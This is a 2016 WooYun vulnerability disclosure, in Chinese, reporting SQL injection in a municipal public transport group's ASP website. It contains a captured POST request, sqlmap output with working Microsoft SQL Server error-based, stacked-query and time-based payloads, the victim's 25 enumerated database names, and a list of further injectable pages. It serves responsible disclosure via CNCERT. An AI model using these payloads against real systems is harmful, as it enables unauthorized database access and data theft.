当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169491

漏洞标题:某市公共交通集团注入一枚

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-01-20 00:50

修复时间:2016-03-06 14:18

公开时间:2016-03-06 14:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-06: 细节向公众公开

简要描述:

rt

详细说明:

#

1 burp抓包
POST /cczn/query.asp HTTP/1.1
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Cookie: TklSys=ResourceList%5FCurrentPage=1&ResourceList%5FParent=20&ResourceList%5FWorkType=; ASPSESSIONIDCQDRBQRR=FECBMBMAIMILEKPLNEAKCGAK; isvoted=voteid2=2; Tsys%5FComment=Email=sample%40email%2Etst&Title=Mr%2E
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=123&optMuDiZhan=1&Submit=%c8%b7%b6%a8
optChuFaZhan参数存在注入

漏洞证明:


#2 注入验证
[21:58:44] [WARNING] if UNION based SQL injection is not detected, please consi
er forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'optChuFaZhan' is vulnerable. Do you want to keep testing the ot
ers (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 228 HTTP(s)
equests:
---
Parameter: optChuFaZhan (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHA
(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END)
+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan
1&Submit=%c8%b7%b6%a8
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing
optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c
%b7%b6%a8
---
[21:58:50] [INFO] testing Microsoft SQL Server
[21:58:50] [INFO] confirming Microsoft SQL Server
[21:58:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[21:58:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 223 times

post注入证明.png


#3 列表
[22:00:52] [INFO] parsing HTTP request from 'ty.txt'
[22:00:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:00:53] [INFO] testing connection to the target URL
[22:00:53] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: optChuFaZhan (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR
(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))
+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=
1&Submit=%c8%b7%b6%a8
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&
optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8
%b7%b6%a8
---
[22:00:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[22:00:53] [INFO] fetching database names
[22:00:53] [INFO] the SQL query used returns 25 entries
[22:00:53] [INFO] retrieved: bak2010
[22:00:53] [INFO] retrieved: bak2011
[22:00:53] [INFO] retrieved: bike
[22:00:54] [INFO] retrieved: cnh1001_db
[22:00:54] [INFO] retrieved: database2
[22:00:54] [INFO] retrieved: dicuz
[22:00:54] [INFO] retrieved: ERP
[22:00:54] [INFO] retrieved: gjmis_system
[22:00:54] [INFO] retrieved: gjmis2011
[22:00:55] [INFO] retrieved: gjmis2012
[22:00:55] [INFO] retrieved: gjmis2013
[22:00:55] [INFO] retrieved: gjmisth2007
[22:00:55] [INFO] retrieved: GJOA
[22:00:55] [INFO] retrieved: GJWY
[22:00:55] [INFO] retrieved: ick
[22:00:55] [INFO] retrieved: kefu
[22:00:56] [INFO] retrieved: master
[22:00:56] [INFO] retrieved: model
[22:00:56] [INFO] retrieved: msdb
[22:00:56] [INFO] retrieved: ReportServer
[22:00:56] [INFO] retrieved: ReportServerTempDB
[22:00:56] [INFO] retrieved: tempdb
[22:00:56] [INFO] retrieved: test
[22:00:56] [INFO] retrieved: webtest
[22:00:57] [INFO] retrieved: YCZ
available databases [25]:
[*] bak2010
[*] bak2011
[*] bike
[*] cnh1001_db
[*] database2
[*] dicuz
[*] ERP
[*] gjmis2011
[*] gjmis2012
[*] gjmis2013
[*] gjmis_system
[*] gjmisth2007
[*] GJOA
[*] GJWY
[*] ick
[*] kefu
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] webtest
[*] YCZ

post注入.png


#4 多个页面存在post注入 ,就不一一截图了
**.**.**.**/more.asp
**.**.**.**/more2.asp
**.**.**.**/more3.asp
**.**.**.**/more4.asp
**.**.**.**/more7.asp
**.**.**.** /more9.asp
**.**.**.** /more_fz.asp
**.**.**.** /more_ygfc.asp

修复方案:

抓紧补吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-22 10:58

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价